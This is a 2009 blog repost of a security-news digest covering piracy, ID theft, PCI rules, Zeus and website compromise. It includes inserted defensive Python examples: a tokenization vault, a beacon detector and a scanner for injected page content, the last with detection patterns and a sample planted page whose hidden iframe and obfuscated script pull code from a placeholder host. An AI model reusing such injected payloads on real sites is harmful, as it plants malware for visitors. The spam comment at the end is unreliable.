Friday, September 04, 2009

Security Management Weekly - September 4, 2009

Corporate Security

  1. "Kenya: Focus Anti-Piracy War on Land, Not Sea"
  2. "Curbing Employee Theft" Although Recession has Sparked Increase in Employee Theft, Employers Can Take Several Steps to Protect Themselves
  3. "Wig-Wearer Said Part of Bernanke ID-Theft Ring" Authorities Say Member of Group Used Wigs to Impersonate ID Theft Victims and Drain Their Bank Accounts
  4. "Don't Look Now" Pending PCI DSS Rules Could Cause Problems for Internet Retailers
  5. "Workplace Bullying No Laughing Matter"
Homeland Security

  1. "How Team of Geeks Cracked the Spy Trade" California Company Introduces Application That Some Say Could be an Effective Tool in Anti-Terrorism Efforts
  2. "North Korea Prepares More Weapons Fuel"
  3. "US Inspection After Pictures of Private Security Contractors in Kabul"
  4. "Gates Says Additional Local Forces May Be Needed in Afghan War"
  5. "Ridge Backpedals on Pressure to Raise Terror Alert Level"
Cyber Security

  1. "Data Leakage Prevention Going Mainstream" Study by Nemertes Research Finds Companies Increasingly Using Data Loss Prevention Systems
  2. "Instant Messenger Speeds Up Data Theft Danger"
  3. "Keeping Your Site Out of Hackers' Clutches" Small Businesses Need to Take Steps to Prevent Their Sites From Being Used to Distribute Malware
  4. "California Security Chief Aims to Secure Social Networks, Teleworkers" Mark Weatherford
  5. "Lawmakers Strike New Tone With Proposed Bill Giving Obama Power to Shut Down Internet"

Corporate Security

Kenya: Focus Anti-Piracy War on Land, Not Sea
allAfrica.com (09/03/09) Marete, Gitonga

Speakers at the Ports Management Association of Eastern and Southern Africa's workshop on maritime safety and port security, held Wednesday in Kenya, said that anti-piracy efforts in the waters off the coast of Somalia will not succeed until greater emphasis is placed on going after pirates on land, before they put to sea. Col. Victor Gamor, the military advisor at the United Nations Political Office on Somalia, said that the large quantities of firearms being shipped to militias in the East African nation are making the piracy problem worse. He called on the international community to do more to address the root causes of piracy and to adopt a comprehensive strategy to stabilize Somalia. Another speaker, Mapolao Mokoena of the Southern African Development Community Secretariat, also said that all countries need to work together to deal with piracy. She noted that public and private maritime security activities should be combined into a single effort that addresses all maritime threats. Participants at the workshop, who came from more than 17 eastern and southern African nations, offered suggestions of their own for dealing with piracy, including arming crew members and providing ships with armed escorts.


Curbing Employee Theft
Human Resource Executive Online (09/02/09) Still, Sally; Lehner, Meghan

The economic recession that has gripped the nation for more than a year has spurred an increase in employee theft, according to a report by i4cp Inc. That report found that 27 percent of respondents at companies with 10,000 or more employees have seen an increase in workplace theft since the recession began. Such theft costs U.S. organizations roughly 7 percent of their annual revenues, according to a separate study by the Association of Certified Fraud Examiners. However, few companies have responded to the growing problem with more or heightened surveillance. Employers risk becoming victims of employee theft if they do not take a number of proactive steps. For instance, human resources departments can help make sure their organizations are hiring the right employees by using pre-employment tests designed to predict potential theft problems. Employers can also deter theft by using cash-reconciliation forms and by separating the accounts payable (AP) and accounts receivable (AR) roles, so that no single employee both initiates and records payments. Finally, employers should have anti-theft policies in place that require employees to report instances of theft.


Wig-Wearer Said Part of Bernanke ID-Theft Ring
Associated Press (09/01/09)

Authorities are learning more about the identity-theft ring that stole the identities of hundreds of people in Illinois, Maryland, Virginia, and Washington, D.C., including the wife of Federal Reserve Chairman Ben Bernanke. Court documents show that the ring stole a total of more than $2.1 million from its victims. Authorities say that one member of the ring, 38-year-old Shonya Michelle Young of Myrtle Beach, S.C., would wear one of three wigs to impersonate her victims, obtain fake IDs, and cash fraudulent checks in order to drain their bank accounts. Authorities say Young--who was arrested Monday and has been charged with conspiracy to commit bank fraud--and other members of the ring committed fraud at no fewer than 10 financial institutions. Authorities also say that the suspected ringleader, Clyde Austin Gray Jr. of Waldorf, Md., hired pickpockets and made fraudulent IDs for the conspirators who carried out the bank transactions. Gray is also believed to have taken a cut of the proceeds. He pleaded guilty in July to charges related to his involvement in the ring.


Don't Look Now
Internet Retailer (09/09) Davis, Don

New PCI Data Security Standard rules scheduled for release next year are expected to be problematic for online merchants. One new rule requires all payment software that handles cardholder data to comply with the Payment Application Data Security Standard (PA-DSS), while another requires certain larger merchants to engage outside auditors for yearly assessments. The new rules and stricter enforcement will likely force merchants to rely more heavily on technology vendors for help with PCI. A recent National Retail Federation survey found that 19 percent of non-compliant smaller merchants did not understand PCI and another 26 percent lacked the financial or technical resources to achieve compliance. SecurityMetrics executive Wenlock Free says banks have provided the company with data on an additional 1.2 million retailers, which indicates that more acquirers will be mandating PCI compliance in the years to come. PCI experts advise retailers that not holding cardholder data at all is one of the best strategies for lowering compliance costs, because only the systems that store, process, or transmit cardholder data are in scope for PCI DSS. Tokenization is one way to achieve this: the merchant keeps only a surrogate token (typically alongside the last four digits) and the actual card number lives with the payment processor or a separate vault, so the merchant's own order and customer systems never hold a credit or debit card number. Retailers also must ensure that their technology vendors comply with PCI requirements, an issue that is especially significant given the July 2010 deadline for payment software to be PCI-compliant.
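To make the scope-reduction point concrete, here is an added example (not code from the article or from any vendor it mentions) of how a tokenization vault separates the merchant's records from the card number. The `TokenVault` class, the `tok_` token format, and the sample card number are assumptions for illustration; the vault would in practice run at the processor or in a segregated environment, with the PAN mapping encrypted at rest. The `find_pans` helper is the kind of check a merchant can run over its own database exports to confirm that nothing in scope survived.

```python
import re
import secrets

# Luhn check: filters random digit runs out of PAN matches (every real card number passes it).
def luhn_ok(digits: str) -> bool:
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:           # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

# 13-19 digits, optionally separated by spaces or dashes, not embedded in a longer digit run.
PAN_RUN = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

def find_pans(text: str) -> list[str]:
    """Return Luhn-valid card numbers found in free text (for scanning exports, logs, records)."""
    hits = []
    for m in PAN_RUN.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            hits.append(digits)
    return hits

class TokenVault:
    """Hypothetical token service living OUTSIDE the merchant's systems.

    The token is random and carries no information about the PAN, so the merchant can
    store and log it freely; only the vault can map it back."""

    def __init__(self) -> None:
        self._pan_by_token: dict[str, str] = {}   # would be encrypted at rest in a real vault
        self._token_by_pan: dict[str, str] = {}

    def tokenize(self, pan: str) -> str:
        digits = re.sub(r"[ -]", "", pan)
        if not (digits.isdigit() and 13 <= len(digits) <= 19 and luhn_ok(digits)):
            raise ValueError("not a plausible card number")
        if digits in self._token_by_pan:          # same card -> same token (lets the merchant
            return self._token_by_pan[digits]      # recognise repeat customers without the PAN)
        token = "tok_" + secrets.token_hex(16)     # assumed token format; 128 bits of randomness
        self._pan_by_token[token] = digits
        self._token_by_pan[digits] = token
        return token

    def detokenize(self, token: str) -> str:
        return self._pan_by_token[token]

def merchant_store_card(vault: TokenVault, pan: str) -> dict[str, str]:
    """What the merchant's order system keeps: a token and the last four digits, never the PAN."""
    token = vault.tokenize(pan)
    digits = re.sub(r"[ -]", "", pan)
    return {"card_token": token, "last4": digits[-4:]}

if __name__ == "__main__":
    vault = TokenVault()
    record = merchant_store_card(vault, "4111 1111 1111 1111")   # constructed test card number
    print("merchant record:", record)
    print("PANs found in merchant record:", find_pans(str(record)))
    print("vault resolves token to:", vault.detokenize(record["card_token"]))
```

The merchant-side record contains nothing that `find_pans` would flag, which is exactly the property an assessor is looking for; the charge itself is made by handing the token to the party that runs the vault.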


Workplace Bullying No Laughing Matter
Nova Scotia Chronicle Herald (Canada) (08/31/09)

Bullying is an increasing problem in the workplace, with 37 percent of workers reporting having been subjected to bullying behaviors, including demeaning remarks, threats, and physical attacks, according to the Workplace Bullying Institute. Of those workers who report being victims of bullying, 40 percent say they never report the behavior to their employers. This reluctance may stem from the institute's other findings, which suggest 62 percent of employers tend to ignore bullying situations. In order to prevent bullying, employers should put in place strict policies that provide victims of bullying with a safe way to report problems and provide guidelines for appropriate action against the perpetrators. Those employees who experience bullying should be aware of these types of policies, either on a company-wide or governmental scale. They should also be educated about the right ways to confront a bully. Experts recommend interrupting the bully's actions, using the bully's name, telling the bully what effect their actions have, and recommending an alternative behavior. Some individuals may also want to inquire as to what prompted the bullying. No matter what the situation, employees who are targets of bullying should not be afraid to ask for support if they need it from a manager or co-worker when they confront a bully. If the bullying persists, employees should speak to a manager or a member of the human resources department. They should also document the bullying in preparation for filing a written complaint, if necessary. Finally, co-workers are encouraged to come to the aid of their fellow employees if they witness bullying and back up victims in their attempt to seek aid from management.


Homeland Security

How Team of Geeks Cracked the Spy Trade
Wall Street Journal (09/04/09) Gorman, Siobhan

Silicon Valley-based Palantir Technologies has designed a software search tool that can query multiple sources of data at once, an advance that experts say could make it the most effective tool for investigating terrorist networks. Palantir's software has already helped uncover terrorist financing networks, revealed new trends in roadside bomb attacks, and exposed the details of Syrian suicide-bombing networks in Iraq. According to current and former officials, it has also helped foil a Pakistani suicide-bombing plot against Western targets and discover a spy's infiltration of an allied government. The software is now used by the CIA, the Pentagon, and the FBI. Palantir got its start in 2003, when Peter Thiel, the billionaire founder of PayPal, pitched an idea to the company's current CEO, Alexander Karp: build software that would uncover terror networks using the approach PayPal had used to track Russian cybercriminals. The two launched Palantir in 2004. Getting the software noticed by major security agencies was difficult, because no one at the company held a security clearance, but the company was not deterred. Every other week for two years, Palantir engineers returned to Washington with product revisions based on analysts' requests. The finished product could connect the databases of various security agencies, a task that had previously been daunting because information had to be collected by hand. In the past two years, Palantir's work in Washington has expanded from eight pilot programs to more than 50 projects. According to executives and officials, the Australian government is now a client, and the NSA and the U.K. are both eyeing Palantir.


North Korea Prepares More Weapons Fuel
Wall Street Journal (09/04/09) P. A12; Ramstad, Evan; Solomon, Jay

In a letter sent to the United Nations Security Council on Thursday, North Korea announced that it had once again begun extracting plutonium from its reactor's spent fuel to build more atomic weapons. Pyongyang also stated in the letter, which was publicly released early Friday by North Korea's state-run news agency, that it was close to being able to build atomic bombs from highly enriched uranium. North Korea acknowledged that its move would likely result in both "dialogue and sanctions," and said it would be forced to take "stronger self-defensive countermeasures" if U.N. member countries put sanctions ahead of dialogue. The reclusive communist country has used similar language in the past to foreshadow weapons tests. The U.S. State Department has not commented on the claims in the letter, though spokesman P.J. Crowley did say that Pyongyang could have "a very different future if it recommits to complete and verifiable denuclearization."


US Inspection After Pictures of Private Security Contractors in Kabul
Times Online (United Kingdom) (09/03/09) Whittell, Giles

The U.S. State Department announced Wednesday that it was sending more than a dozen investigators to Afghanistan to look into the conduct of the private security contractors responsible for protecting the U.S. Embassy in Kabul. The announcement came shortly after the release of photos showing male contractors, employees of ArmorGroup North America, naked and dancing around fires. Other images show naked men drinking vodka and eating food off each other's bodies at the U.S. Embassy. Guards who work for ArmorGroup say the images reflect a culture of fear and coercion in Kabul, and that employees who refused to go along with the hazing rituals depicted in the pictures were liable to be fired. The State Department has vowed to take "prompt and effective action" once its investigation is complete. Officials say, however, that security at the Embassy is already in jeopardy because the pictures have damaged the image of U.S. forces in Afghanistan.


Gates Says Additional Local Forces May Be Needed in Afghan War
Bloomberg (08/31/09) Cook, Peter; Capaccio, Tony

Defense Secretary Robert Gates said Monday that more personnel may be needed to defeat the Taliban in Afghanistan. According to Gates, the 230,800 Afghan police and military forces that are expected to be on the ground in Afghanistan by 2011 may not be enough to make progress against the militant group. Gates' comments came the same day that Gen. Stanley McChrystal, the commander of U.S. and NATO troops in Afghanistan, sent his assessment of the war to Gen. David Petraeus, the commander of U.S. forces in the Middle East and Central Asia, and Anders Fogh Rasmussen, the secretary-general of NATO. In his assessment, McChrystal said the current situation in Afghanistan is serious but that success can be achieved if there is a stronger focus on deploying more Afghan security personnel and protecting civilians. However, the review did not provide a recommendation or request for additional U.S. troops. Rasmussen has said that he will not rule out the possibility of more troops in Afghanistan, but said that there needs to be a significant increase in the number of Afghan soldiers first. The U.S. could be forced to send more troops to support an increase in Afghan security forces, though deploying more troops could be difficult for President Obama, since public support for the Afghan War appears to be declining.


Ridge Backpedals on Pressure to Raise Terror Alert Level
USA Today (08/30/09) Hall, Mimi

Former Department of Homeland Security (DHS) chief Tom Ridge has recanted his assertions that former Secretary of Defense Donald Rumsfeld and Attorney General John Ashcroft pressured him to raise the terror alert level right before Election Day 2004. Specifically, Ridge wrote in his new book, The Test of Our Times, "Ashcroft strongly urged an increase in the threat level, and was supported by Rumsfeld. There was absolutely no support for that position within our department. None. I wondered, 'Is this about security or politics?'" A spokesman for Rumsfeld responded to the accusations, calling them "nonsense." Now, Ridge says he did not mean to suggest that he was under pressure from his colleagues to raise the threat level and he is not accusing anyone of having tried to give President Bush a last-minute boost in the polls. Ridge also attended a panel with his immediate successor Michael Chertoff to discuss possible changes to the color-coded terror alert system, which are being considered by new Homeland Security Secretary Janet Napolitano.


Cyber Security

Data Leakage Prevention Going Mainstream
InfoWorld (09/01/09) Antonopoulos, Andreas M.

Nemertes Research's spring 2009 benchmark study finds that companies are increasingly using data loss prevention (DLP) systems, up drastically from 2007. According to Nemertes, roughly one in three companies now use some form of DLP, while DLP usage barely registered in research performed two years ago. Companies are incorporating DLP for a number of reasons, foremost being compliance. Nemertes anticipates adoption will climb from the current level of about 33 percent to almost 80 percent by 2011, with the highest rates of adoption occurring in the financial services, retail, and health care sectors. No one provider is leading the way in DLP, though distribution appears to be evenly spread among appliance-based solutions, mail and Web scanning services, and endpoint security protection.


Instant Messenger Speeds Up Data Theft Danger
IDG News Service (09/01/09) Kirk, Jeremy

A highly advanced piece of malware in circulation has been updated so that criminals can act more quickly on information stolen from a machine. RSA says the Zeus Trojan, which has been used in innumerable online banking thefts, now incorporates an instant-messaging component that notifies its operators the moment a victim's login credentials are captured, shrinking the window in which a bank or customer can notice the theft and react. In its August Online Fraud Report, RSA notes that Zeus is not the first banking Trojan to use instant messaging this way: the login-stealing Trojan Sinowal was found doing the same in 2008. In August, Damballa estimated the number of Zeus-infected machines in the United States alone at approximately 3.6 million, making it one of the most widespread malware families and a massive botnet. A user can be duped into installing Zeus simply by opening an email attachment containing the malicious program.
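The behaviour RSA describes, an infected host contacting a bank and then immediately beaconing out over an IM protocol, is something a network team can look for in its own egress logs. The following is an added example, not from the RSA report or from any vendor the article mentions, of a simple correlation rule over constructed proxy/firewall log lines. The banking domains, the IM ports, the approved IM server list, the 120-second window, and the log format (`timestamp src_ip dst_host dst_port`) are all assumptions chosen for the example and would be replaced by the organisation's own values.

```python
from datetime import datetime, timedelta

# Assumed tuning values for this example (replace with your own).
BANK_DOMAINS = {"bank.example"}                      # online banking sites your users visit
IM_PORTS = {5222, 5223, 1863, 5190}                  # XMPP, XMPP/TLS, MSN, AIM/ICQ default ports
APPROVED_IM_SERVERS = {"im.corp.example"}            # IM servers that are expected to be reached
WINDOW = timedelta(seconds=120)                      # how soon after a bank visit counts as "immediate"

def parse_line(line: str):
    """Constructed log format: '<ISO timestamp> <src_ip> <dst_host> <dst_port>'."""
    ts, src, dst, port = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port)

def is_bank(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in BANK_DOMAINS)

def find_suspicious_beacons(lines):
    """Flag hosts that open an outbound IM-port connection to an unapproved server
    within WINDOW of visiting a banking site. Returns (timestamp, src, dst, port) tuples."""
    events = sorted(parse_line(l) for l in lines if l.strip())   # sort by timestamp
    last_bank_visit = {}                                          # src_ip -> most recent bank hit
    alerts = []
    for ts, src, dst, port in events:
        if is_bank(dst):
            last_bank_visit[src] = ts
        elif port in IM_PORTS and dst not in APPROVED_IM_SERVERS:
            seen = last_bank_visit.get(src)
            if seen is not None and ts - seen <= WINDOW:
                alerts.append((ts, src, dst, port))
    return alerts

# Constructed sample traffic: 10.0.0.5 shows the pattern, the other two hosts do not.
SAMPLE_LOG = """
2009-09-01T10:00:01 10.0.0.5 online.bank.example 443
2009-09-01T10:00:40 10.0.0.5 203.0.113.9 5222
2009-09-01T10:05:00 10.0.0.7 im.corp.example 5222
2009-09-01T10:06:00 10.0.0.8 203.0.113.9 5222
2009-09-01T10:20:00 10.0.0.5 online.bank.example 443
2009-09-01T10:30:00 10.0.0.5 203.0.113.9 5222
""".strip().splitlines()

if __name__ == "__main__":
    for ts, src, dst, port in find_suspicious_beacons(SAMPLE_LOG):
        print(f"ALERT {ts.isoformat()} {src} -> {dst}:{port} shortly after banking traffic")
```

Only the first connection from 10.0.0.5 is flagged: 10.0.0.7 talks to the approved corporate IM server, 10.0.0.8 never visited a bank, and the 10:30 connection falls outside the window. A real deployment would also need to account for IM clients that are legitimately running in the background, which is why the approved-server list matters more than the port list.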


Keeping Your Site Out of Hackers' Clutches
Wall Street Journal (09/01/09) Richmond, Riva

Because of their size, many small companies do not consider themselves potential targets for hackers, but a growing number of small businesses are becoming victims. Rather than targeting specific sites, attackers often use automated programs that exploit a flaw in a widely used piece of software and attack its millions of users en masse. Once in, they may plant malicious programs designed to steal data, search databases for valuable information, or harvest credit-card numbers. San Diego-based Websense Inc. reported that, in the first half of 2009, 61 percent of the Web's top 100 sites delivered something malicious to visitors because it had been planted there by hackers. To reduce the risk, small businesses should make sure their hosting providers are responsible for security and actually deliver it. Companies that manage their own servers must keep the server software patched and up to date. Custom software should be checked with automated tools that find security flaws and bugs, or assessed by a hired security expert. Penetration testers can also be brought in to find vulnerabilities arising from mistakes in how the site was built. Passwords should be strong, hard to guess, and never shared with people outside the company.
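The "something malicious planted on the site" that Websense counted is usually a hidden iframe or an obfuscated script injected into otherwise legitimate pages. A site owner can look for that footprint in their own pages. Below is an added example, not code from the article or from Websense, of a small scanner that flags hidden or zero-size iframes, `script` tags loading from hosts outside an allowlist, and inline scripts using common obfuscation calls. The hostnames, the allowlist, the obfuscation pattern, and the two sample pages are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-script constructs that legitimate site code rarely needs but injected droppers use a lot.
OBFUSCATION = re.compile(r"\b(unescape|eval|fromCharCode)\s*\(", re.IGNORECASE)

class InjectedContentScanner(HTMLParser):
    """Collects (finding_kind, detail) pairs while parsing one HTML page."""

    def __init__(self, site_host: str, allowed_script_hosts=()):
        super().__init__()
        self.allowed = set(allowed_script_hosts) | {site_host}
        self.findings: list[tuple[str, str]] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style
            if tiny or hidden:                      # a frame the visitor is not meant to see
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            src = a.get("src")
            if src:
                host = urlparse(src).hostname       # None for relative URLs such as /js/app.js
                if host and host not in self.allowed:
                    self.findings.append(("offsite-script", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data, so inline code lands here.
        if self._in_script and OBFUSCATION.search(data):
            self.findings.append(("obfuscated-script", data.strip()[:60]))

def scan_page(html: str, site_host: str, allowed_script_hosts=()) -> list[tuple[str, str]]:
    scanner = InjectedContentScanner(site_host, allowed_script_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed pages: one clean, one with an injected hidden iframe and an obfuscated dropper.
CLEAN_PAGE = """<html><body><h1>Shop</h1>
<script src="/js/app.js"></script>
<script src="http://cdn.example/lib.js"></script>
<iframe src="http://cdn.example/widget" width="300" height="200"></iframe>
</body></html>"""

PLANTED_PAGE = """<html><body><h1>Shop</h1>
<script src="/js/app.js"></script>
<iframe src="http://203.0.113.9/x.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//203.0.113.9/m.js%22%3E%3C/script%3E'))</script>
<script src="http://cdn.example/lib.js"></script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("planted", PLANTED_PAGE)):
        print(name, scan_page(page, "shop.example", ["cdn.example"]))
```

Run this over the site's own templates and a fresh crawl of the live pages: a finding on the live copy that is absent from the template is exactly the injected content the article warns about. It complements, rather than replaces, patching and a proper penetration test, since it only catches what has already been planted.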


California Security Chief Aims to Secure Social Networks, Teleworkers
Government Technology (08/31/09) Towns, Steve

In an interview, Mark Weatherford, California's chief information security officer and head of the state's Office of Information Security, discusses the strategic plan that will set out his office's vision for cybersecurity in the state over the next five years. Weatherford notes that the plan will closely resemble the strategic plan state CIO Teri Takai released earlier this year. "We're also creating a new complement of state enterprise security policies," he says. "State agency CIOs tell me that's what would help them the most—consistent policies that let them know the direction the state is heading and what's expected of them." Weatherford also says that his office is working on a way to let state employees use social networks on the job securely. "We're going to jump out in front of this and get something in place that allows state employees to use social networks," he says. "It's going to be my job to figure out how we can safely and securely implement these technologies in state agencies because in a couple of years we're not going to have this discussion anymore." In addition, Weatherford says that the Office of Information Security has been putting security controls and devices in place to protect teleworkers, and that the state is in the final stages of vetting a security standard for teleworking.


Lawmakers Strike New Tone With Proposed Bill Giving Obama Power to Shut Down Internet
Network World (08/28/09) Fontana, John

The second draft of a U.S. Senate cybersecurity bill scales back language that would have given the president the ability to shut down the Internet in an emergency. The bill, first introduced in April by Sen. John Rockefeller (D-W.Va.), would give the president the authority to direct responses to cyberattacks and to declare a cyber emergency. It would also give the president 180 days after passage to implement a cybersecurity strategy. The first draft, which is still in Rockefeller's Senate Committee on Commerce, Science, and Transportation, has been rewritten with respect to the president's authority to shut down both public and private networks, including Internet traffic involving compromised systems. Critics say that giving the president sweeping power over the Internet is dangerous, since private networks could be shut down by government order and those same networks could become subject to government-mandated security standards and technical configurations. The second draft contains more detailed language concerning the president's control over computer networks and removes some references to the Internet. The new draft narrows the president's authority to matters involving "strategic national interests involving compromised federal government or United States critical infrastructure information system or network," and says the president may direct the national response to cyberthreats in coordination with "relevant industry sectors."


Abstracts Copyright © 2009 Information, Inc. Bethesda, MD



1 comment:

  1. Anonymous 4:19 AM

    all-in-one suite is a tightly integrated set of advanced security layers that, together, create the most secure protection in the industry. Uniquely engineered to prevent threats from getting on a PC in the first place, it has won more major awards than any other Internet security software on the market. The suite combines the robust security features computer experts demand with automatic functions that make it simple enough for novices to use.
